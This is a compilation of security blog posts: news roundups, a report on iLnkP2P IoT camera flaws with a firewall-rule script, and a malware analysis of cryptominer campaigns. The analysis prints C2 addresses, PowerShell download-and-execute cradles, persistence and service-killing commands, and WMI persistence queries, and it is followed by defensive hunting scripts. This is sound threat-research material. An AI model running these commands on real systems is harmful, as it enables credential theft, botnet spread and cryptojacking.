A possible coding error allowed hackers to compromise at least 732 unique, improperly secured private keys used in the Ethereum blockchain. By exploiting a vulnerability, hackers have successfully stolen 38,000 Ethereum coins so far, translating to over $54 million in stolen funds, though the current number is likely much higher. While uncommon, such attacks do show that the industry’s security and key-generation standards have plenty of room for improvement.

Prominent Malware Reverse Engineer Faces Jail Time

The malware researcher Marcus Hutchins, who successfully reversed and stopped the WannaCry ransomware attacks in 2017, is facing up to six years of jail time for prior malware creation and distribution. Hutchins’ charges all tie back to his involvement in the creation of Kronos, a widespread banking Trojan that’s caused significant damage around the world.

Data Exposed for Thousands of Rehab Patients

Personally identifiable data belonging to nearly 145,000 patients of a Pennsylvania rehab facility has been found in a publicly available database. After a Shodan search, researchers discovered the database, which contained roughly 4.9 million unique documents showing information ranging from names and birthdays to specific medical services provided and billing records, all of which could be used to steal the identity of these thousands of individuals.

Study Finds Password Security Still Lacking

After this year’s review of password security it may come as no surprise that the top five passwords still in use are simple and have remained at the top for some time. Using a list generated from past data breaches, researchers found the password “123456” was used over 23 million times, with similar variations rounding out the top five. Several popular names, sports teams, and bands like blink182 and Metallica are still in use for hundreds of thousands of accounts. While these passwords may be easy to remember, they are exceedingly simple to guess. Stronger passwords should include multiple words or numbers to increase the complexity.

Bodybuilding Site Breached through Phishing Campaign

The website bodybuilding.com has announced it was the victim of a data breach stemming from an email phishing campaign in July 2018 that could affect many of the site’s clients. Fortunately, the site doesn’t store full payment card data, and the data it does store is only stored at the customer’s request, leaving little data for hackers to actually use. The site also forced a password reset for all users and issued a warning about suspicious emails coming from bodybuilding.com, noting they may be part of another phishing campaign.

The post High Value Cryptocurrency Stolen by Hackers appeared first on Webroot Blog.

P2P Weakness Exposes Millions of IoT Devices

A peer-to-peer (P2P) communications technology built into millions of security cameras and other consumer electronics includes several critical security flaws that expose the devices to eavesdropping, credential theft and remote compromise, new research has found.

A map showing the distribution of some 2 million iLinkP2P-enabled devices that are vulnerable to eavesdropping, password theft and possibly remote compromise, according to new research.

The security flaws involve iLnkP2P, software developed by China-based Shenzhen Yunni Technology. iLnkP2P is bundled with millions of Internet of Things (IoT) devices, including security cameras and Webcams, baby monitors, smart doorbells, and digital video recorders.

iLnkP2P is designed to allow users of these devices to quickly and easily access them remotely from anywhere in the world, without having to tinker with one’s firewall: Users simply download a mobile app, scan a barcode or enter the six-digit ID stamped onto the bottom of the device, and the P2P software handles the rest.

A Webcam made by HiChip that includes the iLnkP2P software.

But according to an in-depth analysis shared with KrebsOnSecurity by security researcher Paul Marrapese, iLnkP2P devices offer no authentication or encryption and can be easily enumerated, allowing potential attackers to establish a direct connection to these devices while bypassing any firewall restrictions.

Marrapese said a proof-of-concept script he built identified more than two million vulnerable devices around the globe (see map above). He found that 39 percent of the vulnerable IoT things were in China; another 19 percent are located in Europe; seven percent of them are in use in the United States.

Although it may seem impossible to enumerate more than a million devices with just a six-digit ID, Marrapese notes that each ID begins with a unique alphabetic prefix that identifies which manufacturer produced the device, and there are dozens of companies that white-label the iLnkP2P software.

For example, HiChip — a Chinese IoT vendor that Marrapese said accounts for nearly half of the vulnerable devices — uses the prefixes FFFF, GGGG, HHHH, IIII, MMMM, ZZZZ.

These prefixes identify different product lines and vendors that use iLnkP2P. If the code stamped on your IoT device begins with one of these, it is vulnerable.

“In theory, this allows them to support nearly 6 million devices for these prefixes alone,” Marrapese said. “In reality, enumeration of these prefixes has shown that the number of online devices was ~1,517,260 in March 2019. By enumerating all of the other vendor prefixes, that pushes the number toward 2 million.”

Marrapese said he also built a proof-of-concept attack that can steal passwords from devices by abusing their built-in “heartbeat” feature. Upon being connected to a network, iLnkP2P devices will regularly send a heartbeat or “here I am” message to their preconfigured P2P servers and await further instructions.

“A P2P server will direct connection requests to the origin of the most recently-received heartbeat message,” Marrapese said. “Simply by knowing a valid device UID, it is possible for an attacker to issue fraudulent heartbeat messages that will supersede any issued by the genuine device. Upon connecting, most clients will immediately attempt to authenticate as an administrative user in plaintext, allowing an attacker to obtain the credentials to the device.”

To make matters worse, even if an attacker doesn’t want to bother intercepting device passwords, a great many of them will be running in their factory-default state with the factory-default password. The IoT malware Mirai proved this conclusively, as it rapidly spread to millions of devices using nothing more than the default credentials for IoT devices made by dozens of manufacturers.

What’s more, as we saw with Mirai the firmware and software built into these IoT devices is often based on computer code that is many years old and replete with security vulnerabilities, meaning that anyone able to communicate directly with them is also likely to be able to remotely compromise them with malicious software.

Marrapese said despite attempts to notify China’s CERT, iLnk and a half dozen major vendors whose products make up the bulk of the affected devices, none of them have responded to his reports — even though he first started reaching out to them more than four months ago. Neither HiChip nor iLnk responded to requests for comment sent by KrebsOnSecurity.

Interestingly, iLnk’s Web site (p1.i-lnk[.]com) currently appears to be non-functional, and a review of its HTML source code indicates the site is currently compromised by an obfuscated script that tries to redirect visitors to a Chinese gaming Web site.

Despite the widespread impact of these vulnerabilities, Marrapese’s research suggests that remediation from vendors is unlikely – and in fact, unfeasible.

“The nature of these vulnerabilities makes them extremely difficult to remediate for several reasons,” Marrapese wrote. “Software-based remediation is unlikely due to the infeasibility of changing device UIDs, which are permanently assigned during the manufacturing process. Furthermore, even if software patches were issued, the likelihood of most users updating their device firmware is low. Physical device recalls are unlikely as well because of considerable logistical challenges. Shenzhen Yunni Technology is an upstream vendor with inestimable sub-vendors due to the practice of white-labeling and reselling.”

Marrapese said there is no practical way to turn off the P2P functionality on the affected devices. Many IoT devices can punch holes in firewalls using a feature built into hardware-based routers called Universal Plug and Play (UPnP). But simply turning off UPnP on one’s router won’t prevent the devices from establishing a P2P connection as they rely on a different communications technique called “UDP hole punching.”

Marrapese said it should be possible to block vulnerable devices from communicating with any P2P servers by setting up firewall rules that block traffic destined for UDP port 32100.
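One way to act on that advice at the network edge is to look for local hosts that keep talking to UDP port 32100, which is how the heartbeats the article describes show up in flow logs. The script below is an added example, not code from the article or from Marrapese's research; the flow-log format and the RFC 1918 ranges are assumptions, and the sample flows are constructed.

```python
"""Flag LAN hosts that repeatedly send UDP traffic to port 32100 (the P2P server
port named in the article) and emit matching iptables drop rules.
Added example; not code from the article or from the original research."""
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

ILNKP2P_UDP_PORT = 32100  # P2P server port given in the article

# Assumption: the local network uses RFC 1918 addresses; only those are flagged.
PRIVATE_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                ip_network("192.168.0.0/16")]

# Constructed sample flows in a hypothetical "time src:sport -> dst:dport proto" format.
# 192.168.1.23 heartbeats to two P2P servers; 192.168.1.77 sends one datagram only;
# the last two lines are an external source and a DNS query and must be ignored.
SAMPLE_FLOWS = """\
2019-04-26T10:00:01 192.168.1.23:40511 -> 203.0.113.10:32100 udp
2019-04-26T10:00:31 192.168.1.23:40511 -> 203.0.113.10:32100 udp
2019-04-26T10:01:01 192.168.1.23:40511 -> 198.51.100.7:32100 udp
2019-04-26T10:01:02 192.168.1.50:51234 -> 93.184.216.34:443 tcp
2019-04-26T10:01:05 192.168.1.77:60000 -> 203.0.113.10:32100 udp
2019-04-26T10:01:09 203.0.113.99:32100 -> 192.168.1.77:60000 udp
2019-04-26T10:02:00 192.168.1.50:32100 -> 192.0.2.53:53 udp
"""

FLOW_RE = re.compile(r"^(\S+) (\S+):(\d+) -> (\S+):(\d+) (\w+)$")


def parse_flow(line):
    """Return (src, sport, dst, dport, proto) or None for an unparseable line."""
    m = FLOW_RE.match(line.strip())
    if not m:
        return None
    _, src, sport, dst, dport, proto = m.groups()
    return src, int(sport), dst, int(dport), proto.lower()


def is_private(ip):
    addr = ip_address(ip)
    return any(addr in net for net in PRIVATE_NETS)


def find_p2p_talkers(lines, min_flows=2):
    """Map each internal host with at least min_flows UDP flows to port 32100
    onto the set of external servers it contacted. Heartbeats recur, so the
    threshold drops a single stray datagram but keeps a real device."""
    seen = defaultdict(list)
    for line in lines:
        flow = parse_flow(line)
        if flow is None:
            continue
        src, _, dst, dport, proto = flow
        if (proto == "udp" and dport == ILNKP2P_UDP_PORT
                and is_private(src) and not is_private(dst)):
            seen[src].append(dst)
    return {src: set(dsts) for src, dsts in seen.items() if len(dsts) >= min_flows}


def iptables_rules(hosts):
    """Per-host FORWARD rules for a Linux router (an assumption) that drop the
    device's traffic to the P2P port, the mitigation the article describes."""
    return [f"iptables -A FORWARD -s {h} -p udp --dport {ILNKP2P_UDP_PORT} -j DROP"
            for h in sorted(hosts)]


if __name__ == "__main__":
    talkers = find_p2p_talkers(SAMPLE_FLOWS.splitlines())
    for host, servers in talkers.items():
        print(f"{host} -> {sorted(servers)}")
    print("\n".join(iptables_rules(talkers)))
```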

However, a much safer idea would be to simply avoid purchasing or using IoT devices that advertise any P2P capabilities. Previous research has unearthed similar vulnerabilities in the P2P functionality built into other IoT systems. For examples of this, see This is Why People Fear the Internet of Things, and Researchers Find Fresh Fodder for IoT Attack Cannons.

Marrapese documented his findings in more detail here. The enumeration vulnerability has been assigned CVE-2019-11219, and the man-in-the-middle vulnerability has been assigned CVE-2019-11220.

Additional reading: Some Basic Rules for Securing your IoT Stuff.

This Week in Security News: Phishing Attacks and Ransomware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about schemes used in phishing and other email-based attacks. Also, learn how ransomware continues to make a significant impact in the threat landscape.

Read on:

New Report Finds 25% of Phishing Attacks Circumvent Office 365 Security

As email remains a common infection vector because of how easily it can be abused, attackers continue to take advantage of it by crafting threats that are persistent in nature and massive in number.

New Twist in the Stuxnet Story

What a newly discovered missing link to Stuxnet and the now-revived Flame cyber espionage malware add to the narrative of the epic cyber-physical attack.

Cybersecurity Proposal Pits Cyber Pros Against Campaign Finance Hawks

A Federal Election Commission proposal aims to help presidential and congressional campaigns steer clear of hacking operations by allowing nonprofits to provide cybersecurity free of charge.

New Sextortion Scheme Demands Payment in Bitcoin Cash

Trend Micro researchers uncovered a sextortion scheme targeting Italian-speaking users. Based on IP lookups of the spam emails’ senders, they appear to have been sent via the Gamut spam botnet.  

This Free Tool Lets You Test Your Hacker Defenses

Organizations will be able to test their ability to deter hackers and cyberattacks with a free new tool designed by experts at the UK’s National Cyber Security Centre to prepare them against online threats including malware, phishing and other malicious activities.

Ransomware Hits County Offices, Knocks The Weather Channel Offline

On April 18, the systems of The Weather Channel in Atlanta, Georgia, were infected by ransomware, disrupting the channel’s live broadcast for 90 minutes. 

Hacker Finds He Can Remotely Kill Car Engines After Breaking Into GPS Tracking Apps

A hacker broke into thousands of accounts belonging to users of two GPS tracker apps, giving him the ability to monitor the locations of tens of thousands of vehicles and even turn off the engines for some of them while they were in motion.

Uncovering CVE-2019-0232: A Remote Code Execution Vulnerability in Apache Tomcat

Trend Micro delves deeper into this vulnerability by expounding on what it is, how it can be exploited, and how it can be addressed. 

Hacker Dumps Thousands of Sensitive Mexican Embassy Documents Online

A hacker stole thousands of documents related to the inner workings of the Mexican embassy in Guatemala and posted them online.

Cybersecurity: UK Could Build an Automatic National Defense System, Says GCHQ Chief

The UK could one day create a national cyber-defense system built on sharing real-time cybersecurity information between intelligence agencies and business, the head of the UK’s Government Communications Headquarters said at CYBERUK 19.

Do you think the new hacker defenses tool will decrease the number of cyber-attacks targeted at organizations and public sectors? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Phishing Attacks and Ransomware appeared first on .

Weekly Update 136


Scott is still here with me on the Gold Coast lapping up the sunshine before NDC Security next week so I thought we'd do this week's video next to the palm trees and jet ski 😎 But, of course, there's still a heap of stuff happening that's worthy of discussion, everything from the UK gov's NCSC doing good work to the Reply All podcast I was on this week to new data breaches to the ongoing shenanigans involving kids "smart" watches. And oh boy, the communications strategies of a couple of these in particular is just absolutely woeful. All that and more in this week's update.

Oh - and right after I published this, I noticed some crazy static for about 14 seconds at the 27:15 mark. Sorry - I'd republish it but I'd be looking at about 2 hours to re-render and re-upload and this is already going out a couple of hours late so, yeah, sorry!


References

  1. The NCSC has published a list of the worst 100k passwords you can now go and download (these came from HIBP's Pwned Passwords list and are available to download in the clear)
  2. The Pwned Passwords API has really grown in usage lately (10.5M hits a day with a 98.4% cache hit ratio courtesy of Cloudflare)
  3. I was on the Reply All podcast again this week (these guys rock - listen to this podcast at every opportunity!)
  4. TicTokTrack is back online per the schedule they represented last week, but apparently the Sri Lanka bombings meant they were back online... when they said they would be? (that's a link to the original story, their PR process has been absolutely terrible)
  5. There are some very shady communications coming from SPACETALK in the wake of the TicTokTrack incident (seriously guys, when is ambulance chasing ever looked on as a good thing?!)
  6. Varonis is sponsoring my blog this week and giving you access to their free "Enemy Within" course (written by me!)
  7. And whilst we're talking insider threats, let us not forget the man who outsourced his job to China (6 years old now, still kinda stupid and hilarious at the same time)

Miners snatching open source tools to strengthen their malevolent power!

Estimated reading time: 10 minutes

Over the past year, Quick Heal Security Labs has observed a rise in the number of mining malware samples. Mining is one way to earn cryptocurrency, and cryptocurrency-miner malware has become a popular attack vector for cybercriminals because it is easy to deploy and returns money almost immediately. We usually see such miners delivered to victims with a variety of techniques. Rather than writing their own modules from scratch, attackers download existing open source software and modify it slightly.

In this blog post, we discuss a couple of cases where the attack scenario is built on top of such open source tools, and how the trend of abusing open source tools to build new malware benefits malware authors.

The trend is seen especially in cryptojacking cases. Although cryptojacking is a direct source of income for cybercriminals, information stolen from victims’ systems can yield additional money. So these open source tools are used for many purposes: downloader frameworks, information stealing, crypto-mining, DNS changing, Mirai bots and more. This has helped a great deal in forming botnets of similar hosts that together produce more hashes per second. Such open source tools are often readily available on GitHub and similar platforms. We can classify them as exploit frameworks, vulnerability scanners, password stealers, privilege escalators, evaders, etc.


Infection vector:

We received a miner downloader which downloads the multiple components of the attack. This script may reach a system through spam mail, malicious URLs, free-software bundlers or any other conventional method used by malware. We also suspect that a PowerShell script is the initial culprit; the miner’s behaviour is somewhat recursive, so we could not confirm its initial trace on the system.


Technical Analysis:

Fig. 1 Working of miner

The miner downloader creates a file named ‘xpdown.dat’ which contains the IP addresses of the C2 servers from which it downloads further components.

45.58.135.106
103.95.28.54
103.213.246.23
74.222.14.61
Ok.xmr6b.ru

It then downloads the following files from those hosts:

hxxp://45.58.135.106/xpdown.dat
hxxp://45.58.135.106/down.html
hxxp://45.58.135.106/ok/64.html

64.html contains the IP address (174.128.248.10) from which the CPU miner is downloaded.

hxxp://45.58.135.106/kill.txt

kill.txt contains the following list of processes to terminate if they are running on the victim machine.

lsmose.exe, lsmos.exe, conime.exe, lsmosee.exe, 1.exe, lsazs.exe, tasksche.exe, Zationa.exe, csrs.exe, shennong.bat, svshpst.exe, Spoolvs.exe, svchsot.exe, xmrig.exe, srvany.exe, WinSCV.exe, csrswz.exe, csrs.exe, seser.exe, severxxs.exe, mssecsvc.exe, mssecsvr.exe, dsbws.exe


The malware then downloads a text file listing the further payloads to be downloaded.

hxxp://45.58.135.106/down.txt

This down.txt contains the links below (with the local path each payload is saved to). The malware then opens TCP port 32381 on the system.

hxxp://213.183.45.201/downs.exe     (C:\windows\system\downs.exe)
hxxp://66.117.6.174/ups.rar         (C:\windows\system\cab.exe)
hxxp://213.183.60.7/b.exe           (C:\windows\inf\msief.exe)
hxxp://174.128.239.250/item.dll     (C:\windows\debug\item.dat)

Examining the files behind these links, we observed the following.

Downs.exe is a modified version of Microsoft's "CACLS" utility (which displays and modifies access control lists). Ups.rar is saved as cab.exe; this component is a downloader for the Windows variant of the Mirai botnet. It also acts as a DNS changer and opens a backdoor on the system. On execution it performs several operations, such as changing the host's DNS entry to the IP "223.5.5.5", which geolocates to China and whose ISP is "Hangzhou Alibaba Advertising Co.,Ltd."


Fig. 2 Windows Server check

It then checks whether the compromised machine is a Windows server by calling GetVersionExA. If it is, it downloads update.txt from the C2 server and drops it at "C:\windows\system\uplist.txt". The uplist.txt file lists the following payloads to be downloaded and executed.

hxxp://66.117.6.174/wpd.jpg     (C:\windows\system\msinfo.exe)
hxxp://66.117.6.174/my1.html    (C:\windows\system\my1.bat)

It also downloads npptools.dll, 64npf.sys, npf.sys, nsoak.dat, packet.dll and wpcap.dll. These are network packet-processing files that msinfo.exe loads during its execution.

Let’s look into these components one by one.

my1.bat:

The batch file is very stealthy and evasive: it uses several techniques, including "Squiblydoo", a PowerShell "download cradle" and WMI event subscription persistence, to run malicious content on infected machines.

The WMI script contains multiple PowerShell scripts.

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://173.208.139.170/s.txt')

This text file contains another PowerShell downloader as follows:

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://74.222.1.38/up.txt')

"Up.txt" contains code that collects information about the operating system, physical memory and the list of running processes using WMI classes, and then downloads the PowerShell version of Mimikatz from GitHub.

It then steals credentials from the compromised machine and uploads them to the FTP server at 192.187.111.66 using hard-coded FTP credentials.

Fig. 3 Victims Data in FTP Server.

Msinfo.exe:

It is essentially a Windows version of the Mirai botnet, as much of its code matches the previously leaked Mirai source code. When executed with the command-line parameters "-create" and "-run", it determines the architecture of the current system (x86, MIPS, ARM, etc.). Based on that, it checks for its latest update and downloads it if available.

It performs the following tasks according to an encrypted file downloaded from the C2 server.

  1. Implements a spreader mechanism using blind SQL injection (SQLi) and brute-force techniques, with the help of a cracking library and the Hydra tool:
              [Cracker:Telnet] [Cracker:MSSQL] [Cracker:CCTV] [Cracker:MS17010], CrackerWMI, CrackerSSH
  2. Scans various ports such as 80, 8000 and 445 using masscan (a very fast open source port scanner that works similarly to nmap, the popular port scanning tool):
              https://github.com/robertdavidgraham/masscan
  3. Disables specific services by invoking the following command:
              C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm start= disabled&sc stop NlaSvc&sc config NlaSvc start=disabled
  4. Performs a network scan: it collects the public/private IP of the system and all associated information such as geolocation. The attacker then spoofs their own IP as the current system's IP and uses masscan to scan other devices.

Through these steps it turns the system into a bot and adds it to the attacker's botnet. Its code is written in C++ and spread across many source files, such as:

CheckUpdate.cpp
Cracker_Inline.cpp
Cracker_Standalone.cpp
CThreadPool.cpp
Logger_Stdout.cpp
Scanner_Tcp_Connect.cpp
Scanner_Tcp_Raw.cpp
cService.cpp
ServerAgent.cpp
Task_Crack_Ipc.cpp
Task_Crack_Mssql.cpp
Task_Crack_Rdp.cpp
Task_Crack_Ssh.cpp
Task_Crack_Telnet.cpp
Task_Crack_Wmi.cpp
Task_Scan.cpp
WPD.cpp

It mainly targets IoT devices running embedded Linux, so it uses BusyBox (a software suite that provides UNIX utilities, also known as the Swiss Army knife of embedded Linux) to execute remote commands after compromising or cracking those devices by the various means mentioned above.


VBS/BAT Agent For Download Miner:

First, the payload is downloaded to the location below on the victim machine and executed.

hxxp://213.183.60.7/b.exe           (downloaded at C:\windows\inf\msief.exe)

On execution, it drops a VBS file and a batch file at the locations below and runs the VBS file via wscript.exe, which in turn executes the batch file.

C:\Windows\web\c3.bat
C:\Windows\web\n.vbs

The batch file contains a large amount of code. It modifies the attributes of certain folders and files, kills specific processes, deletes some files, modifies the access control of some folders and files, establishes persistence for multiple payloads via the registry, Task Scheduler and WMI event subscriptions, and modifies the firewall policy to block ports 445 and 139.

Fig. 4 Part of C3.bat code

Two further payloads are downloaded from one of the C2 servers listed in xpdown.dat. The first is a disk writer, a DLL file dropped in "C:\Windows\debug". It runs at system start because the batch file above adds a Task Scheduler entry for it:

schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F

The second is the final payload, the XMRig Monero miner, a 64-bit executable downloaded from hxxp://174.128.248.10/64.rar to "C:\windows\debug\lsmos.exe".

On execution, it unpacks itself and drops three files in the current execution folder: an executable (lsmose.exe, 64-bit, packed with VMProtect) and two DLLs (xmrstak_cuda_backend.dll and xmrstak_opencl_backend.dll) that the miner needs in order to run.

We have observed another similar case: a base64-encoded PowerShell script that is essentially cryptomining malware hiding in a WMI class, a stealthy and unusual feature that lets it evade AV and most security products.

After decoding we get the following code:

Fig. 5 Base64-decoded script

The basic workflow of the malware is shown below.

Fig. 6 Basic workflow of the miner with the WMI class

On execution, it checks whether the IP/domain hard-coded in the script is reachable. If it is, it requests a "banner" and receives the response 'SCM Event1 Log'.

Fig. 7 Request for “banner” and another PowerShell Payload

The malware then queries the 'FilterToConsumerBinding' WMI class with the following command

$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding))

and checks whether the result contains 'SCM Event1 Log'. If it does not, it downloads and executes in6.ps1 (64-bit) or in3.ps1 (32-bit) via Invoke-Expression (IEX).

Fig. 8 Request for PowerShell script

in6.ps1/in3.ps1:

These scripts consist of two parts: a base64-encoded gzip data stream and obfuscated code. After de-obfuscation, the code resembles the initial base64-encoded script, with additional features.

Fig. 9 Decoded in6.ps1

The encoded gzip contains four files as mentioned below:

  1. 'mini' – Mimikatz, a credential stealer
  2. 'mon' – Monero CPU miner
  3. 'funs' – a collection of functions, including one that executes a remote DLL via WMI and an EternalBlue vulnerability scanner
  4. 'sc' – shellcode executed on other systems to download the same payload if they are vulnerable to EternalBlue

It creates a WMI class "systemcore_Updater0" in the namespace "root\default" and adds the properties mimi, mon, funs, sc, ipsu and i17.

Fig. 10 Properties of WMI class "systemcoreUpdater0"

It then sets filtername="SCM Event1 Log Filter" and consumername="SCM Event1 Log Consumer".

When an attacker uses WMI as a persistence mechanism, instances of __EventFilter, __EventConsumer and __FilterToConsumerBinding have to be created, and an __InstanceCreationEvent is fired for each of them.

In this case, the attacker uses the following query as the event filter and binds it to the initial base64-encoded script, which is consequently executed approximately every 3 hours.

SELECT * FROM __InstanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System

Fig. 11 Initial PS script hidden in WMI class
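A defender's check for this persistence mechanism, added here as an example and not part of Seqrite's analysis or tooling: it walks every __FilterToConsumerBinding in root\subscription, dereferences the filter and consumer it joins, and flags the names used by this sample, download-cradle patterns in the consumer payload, and the perf-counter polling trick used as a recurring trigger. The filter/consumer names are taken from the analysis above; the payload patterns and the staging-class name pattern are assumptions.

```powershell
# Added example (not Seqrite's code): hunt for WMI event-subscription persistence of the
# kind described above. Run in an elevated Windows PowerShell session on the host being
# triaged. The filter/consumer names come from the analysis; the payload patterns are an
# assumption about what a malicious CommandLineEventConsumer or ActiveScriptEventConsumer
# usually carries.

$subscriptionNs = 'root\subscription'

# Names used by the sample in this analysis (from the page).
$knownBadNames = @(
    'SCM Event1 Log', 'SCM Event1 Log Filter', 'SCM Event1 Log Consumer', 'SCM Event0 Log'
)

# Assumed indicators of a malicious consumer payload (download cradles, encoded commands).
$payloadPatterns = @('powershell', 'IEX', 'Invoke-Expression', 'DownloadString', 'FromBase64String', 'rundll32')

function Get-ConsumerPayload {
    param($Consumer)
    # CommandLineEventConsumer runs a command line; ActiveScriptEventConsumer runs VBScript/JScript.
    if ($Consumer.CommandLineTemplate) { return $Consumer.CommandLineTemplate }
    if ($Consumer.ScriptText)          { return $Consumer.ScriptText }
    return ''
}

function Get-WmiPersistence {
    # One row per __FilterToConsumerBinding, with the filter and consumer it joins.
    foreach ($binding in Get-WmiObject -Namespace $subscriptionNs -Class __FilterToConsumerBinding) {
        $filter   = [wmi]$binding.Filter      # dereference the object path stored on the binding
        $consumer = [wmi]$binding.Consumer
        $payload  = Get-ConsumerPayload $consumer
        $reasons  = @()

        if ($knownBadNames -contains $filter.Name -or $knownBadNames -contains $consumer.Name) {
            $reasons += 'filter/consumer name matches this malware family'
        }
        foreach ($pattern in $payloadPatterns) {
            if ($payload -match [regex]::Escape($pattern)) { $reasons += "payload contains '$pattern'" }
        }
        # Polling a perf counter with WITHIN <seconds> is the usual trick for a recurring trigger.
        if ($filter.Query -match 'Win32_PerfFormattedData_PerfOS_System' -and $filter.Query -match '\bWITHIN\b') {
            $reasons += 'recurring timer-style filter on Win32_PerfFormattedData_PerfOS_System'
        }

        [pscustomobject]@{
            Filter       = $filter.Name
            Query        = $filter.Query
            Consumer     = $consumer.Name
            ConsumerType = $consumer.__CLASS
            Payload      = $payload
            Suspicious   = ($reasons.Count -gt 0)
            Reasons      = ($reasons -join '; ')
        }
    }
}

function Get-WmiStagingClasses {
    # The second sample stores its modules as properties of a custom class in root\default.
    # The name pattern is an assumption derived from "systemcore_Updater0" above.
    Get-WmiObject -Namespace 'root\default' -List |
        Where-Object { $_.Name -like 'systemcore*Updater*' } |
        Select-Object Name, @{ Name = 'Properties'; Expression = { ($_.Properties | ForEach-Object Name) -join ', ' } }
}

# Usage: review every hit before removing anything. Windows ships a legitimate
# "SCM Event Log Filter"/"SCM Event Log Consumer" pair (an NTEventLogEventConsumer),
# so judge on the query and payload, not on the word "SCM" alone.
Get-WmiPersistence | Where-Object Suspicious | Format-List
Get-WmiStagingClasses
```

Removing a confirmed entry is done in the reverse order of its creation (binding first, then filter and consumer) with Remove-WmiObject on the objects the hunt returned; the built-in pair should be left in place.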

It also tries to delete the Task Scheduler entry "sysupdater0" and checks for "sysupdater0.bat" in %systemroot%, removing it as well if it exists.

It modifies the Windows sleep, hibernate and power plan settings by invoking the following commands:

powercfg /CHANGE -standby-timeout-ac 0
powercfg /CHANGE -hibernate-timeout-ac 0
powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

It removes every WMI object in the __FilterToConsumerBinding class under the namespace "root\subscription" whose filter name does not match "SCM Event0 Log".

It then kills any process that has an "ESTABLISHED" connection on port 3333, 5555 or 7777.

It builds a list of the PIDs of running "PowerShell" processes and of the system's network connections. It then checks for a process with an "ESTABLISHED" connection on port 80, 14444, 14433 or 443. If no such process exists and fewer than 8 PowerShell processes are running, it launches the Monero miner through the "funs" module. After that it runs Mimikatz and dumps credentials regardless of whether the Monero miner was started.

It also enumerates network addresses, checks which IPs are active and stores them in the property 'ipsu'. It then scans those IPs for systems vulnerable to MS17-010 (using the EternalBlue scanner script), stores them in the property 'i17', and finally executes shellcode that downloads ze3.ps1 or ze6.ps1, which are identical to in3.ps1 or in6.ps1, depending on the OS architecture.

Fig. 12 Shellcode executed by invoking "WinExec"

The shellcode downloads and executes the PowerShell script to infect other vulnerable systems. In this way the malware spreads to, and mines on, other systems on the network.

In both cases, open source tools are abused heavily to carry out the attack. Mimikatz, masscan and the EternalBlue vulnerability scanner appear to be popular tools among malware authors. Similar techniques are used to spread ransomware too. Seqrite successfully detects such attacks at multiple detection levels.


Indicators of Compromise:

790C213E1227ADEFD2D564217DE86AC9FE660946E1240B5415C55770A951ABFD
46BC86CFF88521671E70EDBBADBC17590305C8F91169F777635E8F529AC21044
AE161E582DE9EC380B3E0B295EFFD62EB8889AC35BC6631A9492CF41563ED14A
0E91F531A05C70B6CF3A8FA942B91A026A5B57069AA5B5C8DFE1EBCBC63AEAE9
EAEF82223EEB8CF404A1D46613D36B9E582304B215201B5E557DB578DD73E04E
30CDBB5C9E23758E8C74E9FDBAEE893D67D3BA42B3B09196CF98395738A67F56
7EC433DD0454553B09F11C39944E251E3EE32E4981F52F02ADC3011EB0CE6537
EA7CEDE3BCB8AD6A8E9FED3CB34F8E6746D445E2044455261EAD4E5092070408
88D338D9FC1990E3D48CDB7E704E785953271EEAB97F196BBCD0C4D2D76F7DC3
789CBE603582262914191882DEC7E6A6F1D61D062D2BDF21B8892BC5854C6196
9868C6F0F23FB81229E2EF765FF524602244384C420D14FFD5708341D85EF4CE
D256AF525680DF6A6178AD608D1700FE5178AA2F3EFE4A52DBCF7AD7EA524936
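A quick host triage for the indicators in this analysis, added here as an example and not part of Seqrite's own tooling: it hashes the dropped-file paths against the SHA-256 list above, looks for the process names from kill.txt, checks for established sessions to the C2 hosts or the miner ports the second sample tests, the TCP 32381 listener, the "Mysa1"/"sysupdater0" tasks, and the 223.5.5.5 DNS change. Every hash, path, port and name is taken from the page; the location assumed for lsmose.exe (the page says it is dropped in the miner's current folder) is an assumption.

```powershell
# Added example (not Seqrite's code): host triage for the indicators named in this analysis.
# Run in an elevated Windows PowerShell session. A hit is a lead to review, not a verdict:
# conime.exe, for instance, is a legitimate Windows binary that merely appears on kill.txt.

# SHA-256 indicators published in the analysis.
$iocHashes = @(
    '790C213E1227ADEFD2D564217DE86AC9FE660946E1240B5415C55770A951ABFD',
    '46BC86CFF88521671E70EDBBADBC17590305C8F91169F777635E8F529AC21044',
    'AE161E582DE9EC380B3E0B295EFFD62EB8889AC35BC6631A9492CF41563ED14A',
    '0E91F531A05C70B6CF3A8FA942B91A026A5B57069AA5B5C8DFE1EBCBC63AEAE9',
    'EAEF82223EEB8CF404A1D46613D36B9E582304B215201B5E557DB578DD73E04E',
    '30CDBB5C9E23758E8C74E9FDBAEE893D67D3BA42B3B09196CF98395738A67F56',
    '7EC433DD0454553B09F11C39944E251E3EE32E4981F52F02ADC3011EB0CE6537',
    'EA7CEDE3BCB8AD6A8E9FED3CB34F8E6746D445E2044455261EAD4E5092070408',
    '88D338D9FC1990E3D48CDB7E704E785953271EEAB97F196BBCD0C4D2D76F7DC3',
    '789CBE603582262914191882DEC7E6A6F1D61D062D2BDF21B8892BC5854C6196',
    '9868C6F0F23FB81229E2EF765FF524602244384C420D14FFD5708341D85EF4CE',
    'D256AF525680DF6A6178AD608D1700FE5178AA2F3EFE4A52DBCF7AD7EA524936'
)

# Drop locations named in the analysis (lsmose.exe location is assumed, see lead-in).
$droppedPaths = @(
    'C:\windows\system\downs.exe',  'C:\windows\system\cab.exe',    'C:\windows\inf\msief.exe',
    'C:\windows\debug\item.dat',    'C:\windows\system\msinfo.exe', 'C:\windows\system\my1.bat',
    'C:\windows\system\uplist.txt', 'C:\Windows\web\c3.bat',        'C:\Windows\web\n.vbs',
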